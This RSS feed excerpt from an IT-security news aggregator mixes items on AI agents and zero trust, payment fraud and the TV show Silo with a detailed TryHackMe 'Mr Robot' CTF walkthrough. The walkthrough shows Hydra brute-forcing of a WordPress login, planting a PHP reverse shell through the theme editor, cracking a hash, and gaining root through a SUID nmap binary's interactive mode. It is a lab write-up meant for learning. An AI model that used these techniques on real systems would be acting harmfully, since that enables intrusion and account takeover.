<guid isPermaLink="true">https://tsecurity.de/de/3649120/it-security-nachrichten/the-agentic-blind-spots-in-your-zero-trust-program/</guid>
<pubDate>Mon, 06 Jul 2026 16:54:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Stephen Wilson, field chief technology officer for HashiCorp, an IBM company, likens AI agents to “really smart kindergartners.”</p>



<p>“They know how to do something, but they have no clue as to why they should do it,” Wilson says.</p>



<p>This combination of superior execution power and lack of judgment can create a significant challenge for organizations trying to fit AI agents into their existing zero trust architectures. In a robust zero trust environment, Wilson notes, human users are first authenticated, then given escalating decision-making powers and access over time, with many organizations potentially taking weeks to onboard an IT employee with elevated privileges. But that model breaks down with AI agents that can be spun up for single tasks and then quickly destroyed.</p>



<p>“Imagine having to onboard and offboard one of these entities within your ecosystem once every second,” Wilson says. “The introduction of AI agents isn’t necessarily creating new problems. But it is exacerbating problems that have always been there.”</p>



<h1 class="wp-block-heading">‘You don’t know when they’re going to be wrong’</h1>



<p>The pressure for organizations to aggressively adopt AI has brought a corresponding pressure to lower or delete barriers between authentication, decision-making, execution, and authorization, Wilson says. Rather than rearchitecting their zero trust programs for AI agents, many organizations are essentially giving the tools broad access and hoping for the best.</p>



<p>“These agents move so quickly, and no one is quite certain exactly what access they should have,” Wilson says. “I’ve never seen this before, where really smart security people are just closing their eyes and moving at a rate that can be dangerous.”</p>



<p>Already, unfettered access for agentic AI could unleash “calamity” within some organizations, Wilson says, with a <a href="https://incidentdatabase.ai/cite/1152/">report</a> emerging that an AI agent deleted entire production databases. “We’ve seen an example of months and months of work disappearing, even in stable software development environments,” Wilson says. “Even if we estimate that AI agents are right 80% of the time, the problem is the other 20%—what happens when they’re wrong?”</p>



<h1 class="wp-block-heading">Taking the long view</h1>



<p>While agentic AI can raise short-term security problems, Wilson sees the technology as a forcing function that will spur long-term improvements to organizations’ zero trust environments. “We’re at an inflection point where we’re going to have to do the hard things,” he says. “With human users, we’ve accepted that we’re not going to move as fast as we want, and we’re going to have to say no a lot. But this is a tidal wave.”</p>



<p>Wilson likens the rise of agentic AI to the debut of the iPhone (“but 10 times more potent”), noting that smartphones forced organizations to create security and governance practices for bring-your-own-device (BYOD) and remote work programs. “Before the iPhone, there was no such thing as BYOD,” he says. “It was very painful at first, but we would not have remote work if it wasn’t for the iPhone.”</p>



<p>“AI brings that same challenge,” Wilson says. Doing the hard things, he adds, means moving to zero standing privilege, issuing dynamic credentials at the moment of use rather than relying on long-lived secrets, and building security in rather than bolting it on. The goal is to keep the human “on the loop” rather than in it, supervising agents without slowing them down. “Some organizations are going to take some hard lumps, but I think we’re going to be more secure in the long run.” </p>



<p>To learn more, visit us <a href="https://www.ibm.com/solutions/agentic-ai-identity-management">here</a>.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of payment fraud could be automated]]></title>
<description><![CDATA[Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and…
Read more →
The post The future...]]></description>
<link>https://tsecurity.de/de/3647741/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647741/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</guid>
<pubDate>Mon, 06 Jul 2026 06:52:30 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/the-future-of-payment-fraud-could-be-automated/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/the-future-of-payment-fraud-could-be-automated/">The future of payment fraud could be automated</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The future of payment fraud could be automated]]></title>
<description><![CDATA[Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and assembling stolen credentials to...]]></description>
<link>https://tsecurity.de/de/3647711/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3647711/it-security-nachrichten/the-future-of-payment-fraud-could-be-automated/</guid>
<pubDate>Mon, 06 Jul 2026 06:07:45 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Payment fraud is becoming more organized as criminal groups use fake websites, large-scale operations, and, in some cases, forced labor to steal money and personal information. Advances in agentic AI could automate many stages of payment fraud, from collecting and assembling stolen credentials to deploying password-cracking tools. What kind of payment fraud concerns you most? (Source: Capco) CAPCO’s “US Payment Fraud Survey” found that consumers increasingly value fraud protection when choosing payment providers. Security was … <a href="https://www.helpnetsecurity.com/2026/07/06/key-payment-fraud-trends-report/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/07/06/key-payment-fraud-trends-report/">The future of payment fraud could be automated</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mr Robot CTF Walkthrough -TryHackMe Detailed]]></title>
<description><![CDATA[Writeup by CobrakaiI recently solved the Mr Robot CTF room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse she...]]></description>
<link>https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3646316/hacking/mr-robot-ctf-walkthrough-tryhackme-detailed/</guid>
<pubDate>Sun, 05 Jul 2026 08:39:10 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/437/1*VBbNWudhR1HvtyMylXnNMg.png"><figcaption>Writeup by Cobrakai</figcaption></figure><p>I recently solved the <strong>Mr Robot CTF</strong> room on TryHackMe. The room is rated medium, but what I liked about it is that it connects a lot of basic penetration testing concepts together: web enumeration, robots.txt inspection, source-code review, WordPress login discovery, reverse shells, hash cracking, Linux privilege escalation, and SUID abuse.</p><p>This writeup follows the complete path I used to move from initial access to root. I have also added explanations for every important step, because the real value of this box is not only getting the flags, but understanding why each step matters.</p><h3>Lab Setup</h3><p>First, I started the TryHackMe machine and connected my Kali Linux machine to the TryHackMe VPN.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>To connect Kali with TryHackMe, download your OpenVPN configuration file from:</p><p><strong>TryHackMe → Access → VPN Settings → Download Configuration File</strong></p><p>If the VPN file is on Windows and your Kali machine is running inside VMware, you can transfer it using scp:</p><pre>scp &lt;FULL-WINDOWS-FILE-PATH&gt; &lt;KALI-USERNAME&gt;@&lt;KALI-IP&gt;:&lt;DESTINATION-PATH&gt;</pre><p>Example:</p><pre>scp C:\Users\user\Downloads\cyberpat.ovpn kali@192.168.1.10:/home/kali/</pre><p>After that, start the VPN connection from Kali:</p><pre>sudo openvpn &lt;FILENAME&gt;.ovpn</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/688/1*WUrhtTw1IfF6ifUf3IkJGA.png"><figcaption>Command to run to connect to the VPN</figcaption></figure><p>Once the VPN was connected, I started the target machine and received the target IP address.</p><h3>Opening the Web Application</h3><p>I opened the target IP in the browser:</p><pre>http://&lt;TARGET-IP&gt;</pre><p>The homepage showed a terminal-style Mr Robot themed interface. There were many commands visible on the page, but they were mostly visual distractions. In this room, the actual path comes from proper enumeration.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/677/1*O2PdkxBJXwnZjCDYXotcSA.png"><figcaption>Front Web Page of the App Part 1</figcaption></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*Ix5Nxx8pZ5hHLFbMUzurXw.png"><figcaption>Front Web Page of the App Part 2</figcaption></figure><h3>Checking robots.txt</h3><p>Before running heavy enumeration, I checked the simplest and most common file first:</p><pre>http://&lt;TARGET-IP&gt;/robots.txt</pre><p>robots.txt is a plain text file placed at the root of a website. It tells search engine crawlers which paths they are allowed or not allowed to crawl.</p><p>In CTFs, this file is often used to hide interesting paths.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*m5Pf6nr3_XxwMUFa2FnlnA.png"><figcaption>Checking Robots.txt</figcaption></figure><p>Inside robots.txt, I found two interesting entries:</p><pre>key-1-of-3.txt<br>fsocity.dic</pre><p>I opened the first file and got the first key:</p><pre>073403c8a58a1f80d943455fb30724b9</pre><p>So the first key was recovered successfully.</p><h3>Nmap Enumeration</h3><p>While checking the web application manually, I also ran an Nmap scan in parallel.</p><pre>sudo nmap -sC -sV -O -A &lt;TARGET-IP&gt;</pre><p>The goal of this scan was to identify open ports, running services, versions, and possible operating system details.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*XcmS17aaKWaV9wFazMeDyg.png"><figcaption>Nmap Scan 1</figcaption></figure><p>The scan showed these important services:</p><pre>22/tcp   open   ssh<br>80/tcp   open   http<br>443/tcp  open   https</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*l7aZo93PY5Mr5f5VFWTasg.png"><figcaption>Nmap Scan 2</figcaption></figure><p>Some useful observations from the scan:</p><ul><li>SSH was exposed remotely.</li><li>HTTP was available on port 80.</li><li>HTTPS was available on port 443.</li><li>The web server disclosed Apache/Ubuntu details.</li><li>The SSL certificate appeared expired.</li></ul><p>These are not direct exploitation points by themselves, but they help build a picture of the target.</p><h3>Downloading fsocity.dic</h3><p>The second interesting file from robots.txt was:</p><pre>fsocity.dic</pre><p>I opened it in the browser and saw that it contained a large wordlist.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/712/1*xuaZvg6pU910v2d3qUx2Sg.png"><figcaption>Downloading the Wordlists</figcaption></figure><p>This wordlist becomes useful later for the alternative Hydra-based username and password discovery method.</p><h3>Directory Enumeration with Gobuster</h3><p>Next, I used Gobuster to enumerate hidden directories and files on the web server.</p><pre>sudo gobuster dir -u http://&lt;TARGET-IP&gt; -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 50 -k</pre><p>Command breakdown:</p><pre>dir</pre><p>Runs Gobuster in directory brute-forcing mode.</p><pre>-u http://&lt;TARGET-IP&gt;</pre><p>Specifies the target URL.</p><pre>-w</pre><p>Specifies the wordlist.</p><pre>-t 50</pre><p>Uses 50 threads to speed up the scan.</p><pre>-k</pre><p>Skips TLS certificate verification. This is mostly useful for HTTPS targets, but it does not hurt if reused in the command.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*JcomDvLAAlnEV-kNXLMicQ.png"><figcaption>Gobuster Scan Running</figcaption></figure><p>Gobuster returned several interesting paths, including WordPress-related directories.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*-pjY06PZDTX7PAsmZjJO0Q.png"><figcaption>Gobuster Scan Results</figcaption></figure><p>Important findings included:</p><pre>/wp-admin<br>/wp-content<br>/wp-includes<br>/wp-login.php<br>/license<br>/readme</pre><p>The /wp-login.php path confirmed that the target was running WordPress.</p><h3>WordPress Login Page</h3><p>I opened the login page:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*qJBRxhlW97Bu-NP4amSxNw.png"><figcaption>Wp-Login Page</figcaption></figure><p>At this point, I needed valid WordPress credentials. The next useful path was /license.</p><h3>Inspecting /license</h3><p>I opened:</p><pre>http://&lt;TARGET-IP&gt;/license</pre><p>The page showed a suspicious message.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/691/1*S5LU74vlvb2K7yOFFyJ6cQ.png"><figcaption>Navigated to the /license Directory</figcaption></figure><p>Whenever a page looks suspicious in a CTF, checking the source code is a good habit. I viewed the page source and found a Base64-looking string hidden inside.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/722/1*JrOrvao3rNySKHEHm8R15A.png"><figcaption>Text at Bottom</figcaption></figure><p>I decoded the Base64 string and recovered credentials for the WordPress user.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*D8BKNTBXYnwHqxmfbQFJpA.png"><figcaption>Decoding the Text</figcaption></figure><p>The credentials were:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>Using these credentials, I logged in to the WordPress admin panel.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*s0BvDREHoEJmof1w9hSgeg.png"><figcaption>Wp-Login Successfull</figcaption></figure><h3>Getting a Reverse Shell through WordPress Theme Editor</h3><p>After logging into WordPress, I started exploring the admin panel.</p><p>The important section was:</p><pre>Appearance → Theme Editor</pre><p>The Theme Editor allowed editing PHP files directly from the WordPress dashboard. This is dangerous because PHP code executed by the web server can be abused to get a reverse shell.</p><p>A reverse shell is a shell where the target machine connects back to the attacker machine.</p><p>In simple terms:</p><ol><li>I start a listener on my machine.</li><li>I place a reverse shell payload on the target.</li><li>The target connects back to my listener.</li><li>I get command execution on the target.</li></ol><p>I used a PHP reverse shell payload generated from:</p><pre>https://www.revshells.com/</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*3UchA43HXsnFpG82qb8u-Q.png"><figcaption>https://revershells.com/</figcaption></figure><p>Important point:</p><p>The IP address inside the reverse shell payload must be the attacker machine IP, not the target IP.</p><p>To find the attacker VPN IP, use:</p><pre>ip a</pre><p>Usually, the TryHackMe VPN interface is tun0.</p><p>Then I edited a PHP theme file from the WordPress Theme Editor.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/690/1*zzeZXtnC53Xqp13Lj1kWwg.png"><figcaption>Replacing with the PHP Reverse Shell Code</figcaption></figure><p>I pasted the PHP reverse shell payload into a theme file such as:</p><pre>archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*37-Uh02yebTRGbS8NOc0AA.png"><figcaption>Pasted the Code</figcaption></figure><p>Before triggering the payload, I started a Netcat listener on my Kali machine:</p><pre>nc -lvnp 4444</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/682/1*vFOHGgyyrEDDoq71Uo7VdA.png"><figcaption>Netcat Listener Started</figcaption></figure><p>Then I accessed the modified PHP file from the browser:</p><pre>http://&lt;TARGET-IP&gt;/wp-content/themes/twentyfifteen/archive.php</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*DWV67QlA1XOYgG9seCe7mg.png"><figcaption>Accessing that Edited PHP File</figcaption></figure><p>Once the page was opened, the target connected back to my listener.</p><h3>Initial Shell Access</h3><p>The reverse shell connected successfully.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*OQyRkLeDQWLzedGiL85_dw.png"><figcaption>Voila, Got the Reverse Shell</figcaption></figure><p>I checked the current user:</p><pre>whoami</pre><p>The shell was running as the web server user, not as root.</p><p>Then I started enumerating the filesystem.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*BScsAYqgAMEJ8iOC7bEsOg.png"><figcaption>Got the Key 2 As Well</figcaption></figure><p>Inside /home/robot, I found:</p><pre>key-2-of-3.txt<br>password.raw-md5</pre><p>The second key file was not directly readable because of permissions. However, the password hash file was readable.</p><p>The hash looked like this:</p><pre>robot:c3fcd3d76192e4007dfb496cca67e13b</pre><p>This was an MD5 hash for the robot user.</p><h3>Cracking the Robot User Hash</h3><p>I cracked the MD5 hash and got the password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/683/1*Cq5fXr8MtrmOoBUp7gV1rw.png"><figcaption>Cracking the Robot Password</figcaption></figure><p>Before switching users, I stabilized the shell.</p><p>A basic reverse shell often behaves badly:</p><ul><li>Arrow keys may not work.</li><li>Ctrl + C may kill the shell.</li><li>su, clear, nano, and similar commands may not work properly.</li><li>There is no proper TTY.</li></ul><p>To spawn a better shell, I used:</p><pre>python3 -c 'import pty; pty.spawn("/bin/bash")'</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/686/1*m-8NWLldbgqSgzJysMESVA.png"><figcaption>Switching to the Robot User</figcaption></figure><p>Then I switched to the robot user:</p><pre>su robot</pre><p>Password:</p><pre>abcdefghijklmnopqrstuvwxyz</pre><p>After switching users, I read the second key:</p><pre>cat /home/robot/key-2-of-3.txt</pre><p>The second key was:</p><pre>822c73956184f694993bede3eb39f959</pre><p>I confirmed the current user:</p><pre>whoami<br>id<br>hostname</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/692/1*ajN7CbP56HWgIitDX0Vm9w.png"></figure><h3>Privilege Escalation Enumeration</h3><p>At this point, I had access as the robot user, but the final key was inside /root, so privilege escalation was required.</p><p>One common Linux privilege escalation technique is checking for SUID binaries.</p><p>SUID stands for <strong>Set User ID</strong>.</p><p>If a binary has the SUID bit enabled, it runs with the permissions of the file owner instead of the user who executes it.</p><p>If a SUID binary is owned by root, it may be possible to abuse it for root-level execution.</p><p>I searched for SUID binaries using:</p><pre>find / -perm -u=s -type f 2&gt;/dev/null</pre><p>Command breakdown:</p><pre>find /</pre><p>Search from the root of the filesystem.</p><pre>-perm -u=s</pre><p>Find files where the SUID bit is set for the owner.</p><pre>-type f</pre><p>Only return regular files.</p><pre>2&gt;/dev/null</pre><p>Hide permission-denied errors.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*xATgnc0v_thCZNmhW5jSuw.png"><figcaption>Finding the SUID Permissions</figcaption></figure><p>The interesting result was:</p><pre>/usr/local/bin/nmap</pre><p>This stood out because nmap should normally not be SUID.</p><p>Also, the location was suspicious:</p><pre>/usr/local/bin/nmap</pre><p>The /usr/local/bin directory usually contains manually installed binaries, not default system binaries.</p><p>Older versions of Nmap had an interactive mode that could execute shell commands. If that old Nmap binary has the SUID bit and is owned by root, it can be abused to spawn a root shell.</p><p>I checked it using:</p><pre>ls -la /usr/local/bin/nmap<br>/usr/local/bin/nmap --version</pre><p>Then I started interactive mode:</p><pre>/usr/local/bin/nmap --interactive</pre><p>Inside the Nmap interactive prompt, I used:</p><pre>!sh</pre><p>That spawned a shell.</p><p>I confirmed root access:</p><pre>whoami</pre><p>Output:</p><pre>root</pre><p>Then I read the final key:</p><pre>cat /root/key-3-of-3.txt</pre><figure><img alt="" src="https://cdn-images-1.medium.com/max/687/1*qXCV_UlQNk6RdxPtqOKmzg.png"><figcaption>Voila, Got 3rd Key As Well.</figcaption></figure><p>The third key was:</p><pre>04787ddef27c3dee1ee161b21670b4e4</pre><p>At this point, all three keys were recovered.</p><h3>Alternative Method: Finding Elliot Credentials with Hydra</h3><p>The /license method gives the WordPress password quickly, but there is another method using the fsocity.dic wordlist.</p><p>This method is useful because it teaches how to use Hydra against a WordPress login form.</p><h3>Cleaning the Wordlist</h3><p>First, I checked the size of the original wordlist:</p><pre>wc -w fsocity.dic</pre><p>The file was very large and had many duplicate entries.</p><p>To clean it, I sorted the file and removed duplicates:</p><pre>sort fsocity.dic | uniq &gt; fs-list</pre><p>Then I checked the size again:</p><pre>wc -w fs-list</pre><p>Command breakdown:</p><pre>wc -w fsocity.dic</pre><p>Counts the number of words in fsocity.dic.</p><pre>sort fsocity.dic</pre><p>Sorts the wordlist alphabetically.</p><pre>uniq</pre><p>Removes adjacent duplicate lines.</p><pre>&gt; fs-list</pre><p>Saves the cleaned output into a new file named fs-list.</p><p>This smaller cleaned wordlist makes Hydra faster.</p><h3>Finding the Valid WordPress Username</h3><p>Using Burp Suite, I inspected the WordPress login request.</p><p>The important POST parameters were:</p><pre>log<br>pwd</pre><p>WordPress used this error message when the username was invalid:</p><pre>Invalid username</pre><p>So I used Hydra to test every word from fs-list as a possible username while keeping the password fixed as test.</p><pre>hydra -L fs-list -p test &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=Invalid username" -t 30</pre><p>Command breakdown:</p><pre>-L fs-list</pre><p>Use usernames from the file fs-list.</p><pre>-p test</pre><p>Use one static password: test.</p><pre>http-post-form</pre><p>Tell Hydra that the target login uses an HTTP POST form.</p><pre>/wp-login.php</pre><p>WordPress login endpoint.</p><pre>log=^USER^&amp;pwd=^PASS^</pre><p>Hydra replaces ^USER^ with each username from the file and ^PASS^ with the static password.</p><pre>F=Invalid username</pre><p>Failure condition. If the response contains Invalid username, Hydra treats the attempt as failed.</p><pre>-t 30</pre><p>Run 30 parallel tasks.</p><p>Hydra found the valid username:</p><pre>elliot</pre><p>Important note: Hydra may show test beside the username in this step. That does not mean test is the correct password. It only means the username is valid.</p><h3>Finding Elliot’s Password</h3><p>After finding the username, I kept the username fixed and brute-forced the password using the same cleaned wordlist.</p><p>WordPress shows a different error when the username is valid but the password is wrong:</p><pre>The password you entered for the username</pre><p>So I used that as the failure condition:</p><pre>hydra -l elliot -P fs-list &lt;TARGET-IP&gt; http-post-form "/wp-login.php:log=^USER^&amp;pwd=^PASS^:F=The password you entered for the username" -t 30</pre><p>Command breakdown:</p><pre>-l elliot</pre><p>Use one static username.</p><pre>-P fs-list</pre><p>Use passwords from the file fs-list.</p><pre>F=The password you entered for the username</pre><p>If this message appears, Hydra knows the password is wrong.</p><p>Hydra found the valid credentials:</p><pre>Username: elliot<br>Password: ER28-0652</pre><p>These credentials can be used to log in here:</p><pre>http://&lt;TARGET-IP&gt;/wp-login.php</pre><h3>What I Learned</h3><p>This room is a good example of why basic enumeration matters.</p><p>The important lessons were:</p><ul><li>Always check robots.txt.</li><li>Do not ignore source code comments or hidden strings.</li><li>Directory brute-forcing can reveal critical application paths.</li><li>WordPress admin access can lead to code execution if theme editing is available.</li><li>Reverse shells require the attacker IP, not the target IP.</li><li>Always stabilize your shell before using commands like su.</li><li>Readable password hashes can lead to user switching.</li><li>SUID binaries are a major Linux privilege escalation vector.</li><li>Unusual SUID binaries in /usr/local/bin deserve attention.</li><li>Old versions of common tools can become privilege escalation paths.</li></ul><p>The box starts with simple web enumeration and ends with Linux privilege escalation through an old SUID Nmap binary. That makes it a solid practice machine for connecting web exploitation with post-exploitation basics.</p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=678d7908d472" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/mr-robot-ctf-walkthrough-tryhackme-detailed-678d7908d472">Mr Robot CTF Walkthrough -TryHackMe Detailed</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 2 Spoilers: Juliette’s Memories Could Change Everything]]></title>
<description><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season...]]></description>
<link>https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645595/ios-mac-os/silo-season-3-episode-2-spoilers-juliettes-memories-could-change-everything/</guid>
<pubDate>Sat, 04 Jul 2026 18:10:01 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 2 is already one of the most anticipated Apple TV episodes this week, mainly because Juliette’s memory loss has changed the direction of the story after her return to Silo 18. Season 3 premiered on July 3, 2026, and Episode 2 arrives on July 10, 2026.



Related: Silo Season 3 Episode 1 Ending Explained: Why Juliette Can’t Remember



The new season continues after the rebellion, but the real twist is Juliette’s condition. She survived her forced cleaning, yet she returns without clear memories, which gives Robert Sims and Camille more room to control the story inside the silo.



Silo Season 3 Episode 2 Could Push Juliette Toward a Dangerous Truth



Spoilers ahead for Silo Season 3 Episode 1.



Juliette is back, but she is not fully herself. Her missing memories make her weaker in front of people who want power, but small flashes from the past can still lead her back to the truth.



Episode 2 is expected to build on this confusion. The biggest tension now is whether Juliette can remember what happened with Bernard, what she saw outside, and why the silo is still hiding so much from its own people.



Season 3 also opens the door to the “Before Times,” showing events from centuries earlier. This storyline follows journalist Helen Drew and Congressman Daniel Keene as they uncover a conspiracy tied to the creation of the silos.



Related: Silo Season 3 Cast Guide: Who Are the New Characters?



That twist makes Episode 2 more important because the show is no longer only about survival underground. It is also about why the world reached this point in the first place.



What Makes Episode 2 So Important?



Episode 2 can move the story in three key directions:



• Juliette may start questioning the version of events being fed to her.



• Sims and Camille may tighten their grip on Silo 18.



• The flashback timeline may reveal more about the original plan behind the silos.



The season has 10 episodes, with new episodes releasing weekly on Fridays until September 4, 2026.



FAQs



When will Silo Season 3 Episode 2 release? Silo Season 3 Episode 2 will release on Friday, July 10, 2026, on Apple TV.  How many episodes are in Silo Season 3? Silo Season 3 has 10 episodes. Apple TV is releasing one new episode every week.  What is the main twist in Silo Season 3? The main twist is Juliette’s memory loss after surviving her forced cleaning. The season also adds a major origin story set centuries before the present timeline.  Is Silo Season 3 connected to the books? Yes, Silo is based on Hugh Howey’s books, and Season 3 uses material linked to Shift and Dust while also expanding parts of the story for TV.  



Silo Season 3 Episode 2 looks ready to deepen the mystery around Juliette, Silo 18, and the origin of the underground world. 



Apple TV costs $12.99 per month in the US. What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[Silo Season 3 Episode 1 Ending Explained: Why Juliette Can’t Remember]]></title>
<description><![CDATA[Silo Season 3 Episode 1 opens with Juliette Nichols back at the center of the story, but she is no longer the same person viewers followed through the first two seasons. The premiere focuses on her memory loss, the unrest inside the silo, and a new timeline that begins to explain how the whole sy...]]></description>
<link>https://tsecurity.de/de/3645087/ios-mac-os/silo-season-3-episode-1-ending-explained-why-juliette-cant-remember/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3645087/ios-mac-os/silo-season-3-episode-1-ending-explained-why-juliette-cant-remember/</guid>
<pubDate>Sat, 04 Jul 2026 11:09:12 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Silo Season 3 Episode 1 opens with Juliette Nichols back at the center of the story, but she is no longer the same person viewers followed through the first two seasons. The premiere focuses on her memory loss, the unrest inside the silo, and a new timeline that begins to explain how the whole system started.



Silo Season 3 Episode 1 Recap



The episode picks up after Juliette survives her forced cleaning and returns to Silo 18. People now see her as a symbol of hope, especially after the rebellion and the chaos caused by Bernard’s rule.



Related: Silo Season 3 Cast Guide: Who Are the New Characters?



However, Juliette does not remember everything clearly. She struggles to recognize people, understand what happened, and explain what she saw outside. This makes her return more dangerous because the truth about the other silos still remains hidden.



Inside the silo, Judge Sims and Camille gain more control. Their actions show that they want to keep Juliette quiet before she can expose anything that changes the balance of power.



What Happens To Bernard?



One major shock comes when the episode reveals that Bernard is dead. Sims and Camille are connected to his death, and this changes the leadership structure inside Silo 18.



With Bernard gone, Juliette unexpectedly becomes mayor. This gives people hope, but it also puts her in a difficult position because she cannot fully trust her own memory.



The Before Times Timeline Explained



Season 3 also introduces a new story set before the silos existed. This timeline follows Congressman Daniel Keene and journalist Helen Drew as they begin uncovering a dangerous conspiracy.



This part of the episode expands the show beyond Silo 18. It shows that the mystery of the silos is tied to decisions made long before Juliette’s time.



Silo Season 3 Episode 1 Ending Explained



The ending focuses on Juliette’s broken memory and the question of identity. Her confusion is not random. The episode suggests that someone has used memory-suppressing drugs to stop her from revealing the truth.



The phrase “Who are you?” becomes important because it connects Juliette’s condition with the larger mystery in the past timeline. The show hints that memory control may be one of the biggest tools used to keep people trapped, obedient, and unaware.



Final Thoughts



Silo Season 3 Episode 1 sets up a darker and more complex chapter for the Apple TV+ series. Juliette’s return should have been a victory, but her memory loss turns it into another mystery.



The premiere gives fans new questions about the origin of the silos, the role of Sims and Camille, and the truth Juliette is still trying to remember.]]></content:encoded>
</item>
<item>
<title><![CDATA[Host & Network Penetration Testing: Exploitation CTF 2 — eJPT (INE)]]></title>
<description><![CDATA[A walkthrough covering SMB brute-forcing, Pass-the-Hash attacks, FTP credential reuse, and ASPX webshell upload to capture all four flags.Hello everyone!In this blog, I’ll walk through Exploitation CTF 2 from INE’s eJPT path. One Windows target, four flags — and if you read the questions carefull...]]></description>
<link>https://tsecurity.de/de/3644766/hacking/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3644766/hacking/host-network-penetration-testing-exploitation-ctf-2-ejpt-ine/</guid>
<pubDate>Sat, 04 Jul 2026 06:38:38 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
